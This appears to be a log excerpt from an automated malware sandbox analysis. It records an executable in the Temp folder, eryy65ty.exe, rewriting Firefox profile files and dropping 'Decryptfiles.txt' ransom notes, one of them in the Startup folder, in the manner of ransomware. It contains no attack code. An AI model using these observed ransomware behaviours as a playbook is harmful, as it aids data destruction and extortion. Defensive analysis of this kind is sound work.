Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt VolumeInformation
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D408592 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D408592

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal.bKmkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966540.1912e5a9-a49a-44a5-95c6-6e047a7410c8.new-profile.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966546.1036486f-a56a-437b-b1e7-a2f1fa5fb914.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966546.1036486f-a56a-437b-b1e7-a2f1fa5fb914.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971707.a2d29e6c-ac08-481c-a5a2-3b45379df53a.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966547.008ede48-c825-4f89-a2a2-325df2c42c07.first-shutdown.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966547.008ede48-c825-4f89-a2a2-325df2c42c07.first-shutdown.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.1d0a55ec-8147-406f-a800-14c2abac24f9.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.1d0a55ec-8147-406f-a800-14c2abac24f9.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.b5870d07-97bf-4bf9-a21f-d4715e2d8984.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.binJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\background-updateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\eventsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\036d0311-0554-4100-9fa8-d932e8d08b3aJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1864fd66-67cd-4e70-8503-03455dd087efJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1eec0575-b4e6-4e3a-8120-1c64a549cf4dJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1eec0575-b4e6-4e3a-8120-1c64a549cf4dJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3026813b-3a35-4f80-9cae-dbfc31ca1561Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\36538aaa-6959-4075-90b3-e0189a8af344Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3c7a728e-a155-4cc6-a293-522ff9409223Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\5fde80e9-4710-4773-9d91-3de50eb3a611Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\612c12d3-948f-48f6-91fb-d0d8ccda0670Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\68582a3e-63c9-4674-9a87-c796e9492d98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\8e0ea440-692c-4546-bda1-eee741f68cacJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\bc3a7ef5-b3fe-4d70-bd89-e3ab232ffcdbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\cda89272-a9f9-47ec-8bfb-229c7c5839c5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\e55a0594-28e6-48b8-887a-84c346ad1268Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-wal.dUWqJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-shmJump to behavior
